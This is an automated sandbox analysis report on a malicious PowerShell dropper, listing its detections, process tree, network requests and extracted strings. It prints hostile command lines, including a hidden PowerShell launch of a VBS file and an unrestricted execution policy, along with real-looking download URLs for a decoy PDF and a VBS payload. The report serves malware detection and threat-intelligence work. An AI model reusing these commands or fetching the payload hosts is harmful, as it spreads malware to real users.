Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
H2PspQWoHE.ps1

Overview

General Information

Sample name:H2PspQWoHE.ps1
renamed because original name is a hash value
Original sample name:e3439125d29714a7c9f8f4e8a36c2d0ffc4d5acd926589a4caf255c2b808758a.ps1
Analysis ID:1578232
MD5:50369a734ca9b35060392add93bbda5e
SHA1:5197e459dd8f1c2f5b446362c66ddea893b6918b
SHA256:e3439125d29714a7c9f8f4e8a36c2d0ffc4d5acd926589a4caf255c2b808758a
Tags:185-236-228-9287-120-112-91ps1www-al-rasikh-comuser-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H2PspQWoHE.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 344 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\u40i6i.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • Acrobat.exe (PID: 7424 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 7636 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 7876 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1740,i,2940798524316865410,17864825841672361364,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 7736 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 528JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_528.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Suspicious PowerShell Parameter Substring
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\u40i6i.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\u40i6i.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H2PspQWoHE.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 528, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\u40i6i.vbs'", ProcessId: 344, ProcessName: powershell.exe
      Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
      Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 528, TargetFilename: C:\Users\Public\i0s.vbs
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H2PspQWoHE.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H2PspQWoHE.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H2PspQWoHE.ps1", ProcessId: 528, ProcessName: powershell.exe
      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 528, TargetFilename: C:\Users\Public\i0s.vbs
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H2PspQWoHE.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H2PspQWoHE.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H2PspQWoHE.ps1", ProcessId: 528, ProcessName: powershell.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7736, ProcessName: svchost.exe

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: H2PspQWoHE.ps1Avira: detected
      Multi AV Scanner detection for submitted file
      Source: H2PspQWoHE.ps1Virustotal: Detection: 33%Perma Link
      Source: H2PspQWoHE.ps1ReversingLabs: Detection: 34%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.6% probability
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.9:49732 version: TLS 1.2
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1573793509.000001EEC714B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1446516271.000001B09D3C0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: gement.Automation.pdb9 source: powershell.exe, 00000003.00000002.1448213246.000001B09D60F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1678011340.000001EEE133C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1671504647.000001EEE1090000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.1678011340.000001EEE13D3000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32h source: powershell.exe, 00000000.00000002.1573793509.000001EEC714B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb: source: powershell.exe, 00000000.00000002.1678011340.000001EEE13D3000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: -n.pdb source: powershell.exe, 00000003.00000002.1449073605.000001B09D6DD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.1678011340.000001EEE133C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1416881939.000001B08336F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000003.00000002.1449073605.000001B09D6DD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: lib.pdbV source: powershell.exe, 00000000.00000002.1671504647.000001EEE1090000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb5 source: powershell.exe, 00000000.00000002.1671504647.000001EEE111D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: tomation.pdbh source: powershell.exe, 00000000.00000002.1671504647.000001EEE111D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000000.00000002.1573793509.000001EEC714B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: pdbpdblib.pdbu source: powershell.exe, 00000000.00000002.1671504647.000001EEE1090000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: global trafficHTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.astenterprises.com.pkConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ms/ms.vbs HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 203.175.174.69 203.175.174.69
      Source: Joe Sandbox ViewIP Address: 107.161.23.150 107.161.23.150
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.astenterprises.com.pkConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ms/ms.vbs HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: www.astenterprises.com.pk
      Source: global trafficDNS traffic detected: DNS query: www.bluemaxxlaser.com
      Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 11:51:01 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: powershell.exe, 00000000.00000002.1580972870.000001EECAA84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://astenterprises.com.pk
      Source: powershell.exe, 00000003.00000002.1449073605.000001B09D6DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.moQ
      Source: svchost.exe, 00000009.00000002.2616865544.000001D9E9E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
      Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: qmgr.db.9.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: powershell.exe, 00000003.00000002.1417398167.000001B085AB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
      Source: powershell.exe, 00000000.00000002.1663713280.000001EED8FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1663713280.000001EED9134000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1442104886.000001B095221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000003.00000002.1417398167.000001B0853D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000003.00000002.1417398167.000001B0853D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000000.00000002.1580972870.000001EEC8F81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1417398167.000001B0851B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000003.00000002.1417398167.000001B0853D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000003.00000002.1417398167.000001B0853D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.1580972870.000001EECAA84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.astenterprises.com.pk
      Source: powershell.exe, 00000000.00000002.1580972870.000001EECAABE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1580972870.000001EECAB1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com
      Source: powershell.exe, 00000000.00000002.1580972870.000001EECAABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com/ms/ms.vbs
      Source: powershell.exe, 00000000.00000002.1580972870.000001EEC91B2000.00000004.00000800.00020000.00000000.sdmp, H2PspQWoHE.ps1String found in binary or memory: http://www.bluznpmaxxlasznpr.com/ms/ms.vbs
      Source: powershell.exe, 00000000.00000002.1677670187.000001EEE11C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
      Source: 2D85F72862B55C4EADD9E66E06947F3D0.8.drString found in binary or memory: http://x1.i.lencr.org/
      Source: powershell.exe, 00000000.00000002.1580972870.000001EEC8F81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1417398167.000001B0851B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000003.00000002.1417398167.000001B0853D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000003.00000002.1417398167.000001B0864C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
      Source: powershell.exe, 00000003.00000002.1442104886.000001B095221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000003.00000002.1442104886.000001B095221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000003.00000002.1442104886.000001B095221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
      Source: svchost.exe, 00000009.00000003.1532335665.000001D9EA000000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
      Source: powershell.exe, 00000003.00000002.1417398167.000001B0853D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.1580972870.000001EEC9BB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1417398167.000001B085AB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1417398167.000001B0864C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000003.00000002.1446516271.000001B09D414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co$Q
      Source: powershell.exe, 00000000.00000002.1663713280.000001EED8FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1663713280.000001EED9134000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1442104886.000001B095221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: ReaderMessages.6.drString found in binary or memory: https://www.adobe.co
      Source: powershell.exe, 00000000.00000002.1580972870.000001EECA5B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1580972870.000001EECAA7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk
      Source: powershell.exe, 00000000.00000002.1580972870.000001EECA5B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/List
      Source: powershell.exe, 00000000.00000002.1580972870.000001EECA5B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf
      Source: powershell.exe, 00000000.00000002.1580972870.000001EECA5B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astznpntznprprisznps.com.pk/ms/List%20of%20rznpquirznpd%20itznpms%20and%20sznprvicznps.p
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.9:49732 version: TLS 1.2
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: classification engineClassification label: mal84.evad.winPS1@20/61@3/3
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\List of Required items and services.pdfJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2960:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqdozznm.h1s.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\u40i6i.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: H2PspQWoHE.ps1Virustotal: Detection: 33%
      Source: H2PspQWoHE.ps1ReversingLabs: Detection: 34%
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H2PspQWoHE.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\u40i6i.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1740,i,2940798524316865410,17864825841672361364,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\u40i6i.vbs'"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1740,i,2940798524316865410,17864825841672361364,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
